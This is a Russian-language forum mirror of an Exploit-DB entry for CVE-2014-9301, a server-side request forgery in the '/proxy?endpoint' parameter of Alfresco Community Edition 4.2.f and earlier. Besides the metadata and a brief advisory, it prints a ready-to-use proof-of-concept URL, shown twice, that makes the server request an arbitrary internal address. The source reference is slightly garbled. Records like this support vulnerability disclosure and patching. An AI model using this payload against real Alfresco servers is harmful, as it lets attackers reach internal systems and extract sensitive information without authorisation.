- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 39258
- Проверка EDB
-
- Пройдено
- Автор
- V. PAULIKAS
- Тип уязвимости
- REMOTE
- Платформа
- MULTIPLE
- CVE
- cve-2014-9301
- Дата публикации
- 2014-07-16
Alfresco - '/proxy?endpoint' Server-Side Request Forgery
Код:
source: https://www.securityfocus.com/bid/68/info
http://www.example.com/alfresco/proxy?endpoint=http://internal_system:port 663/info
Alfresco Community Edition is prone to multiple security vulnerabilities.
An attacker may leverage these issues to gain sensitive information or bypass certain security restrictions.
Alfresco Community Edition 4.2.f and earlier are vulnerable.
http://www.example.com/alfresco/proxy?endpoint=http://internal_system:port
- Источник
- www.exploit-db.com